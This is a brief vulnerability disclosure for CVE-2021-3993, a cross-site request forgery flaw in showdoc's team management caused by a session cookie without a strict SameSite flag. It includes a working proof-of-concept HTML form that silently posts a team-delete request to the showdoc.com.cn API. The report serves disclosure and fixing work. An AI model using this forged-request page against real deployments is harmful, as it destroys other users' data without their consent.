CVE-2021-3993: Cross-Site Request Forgery (CSRF) in showdoc

Description

You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don’t have strict flag.

Proof of Concept

1.replace 38046 with the team id

2.open poc.html and click on submit button.

3.after that the team with id 38046 or your replaced team id will be deleted.

//poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Occurences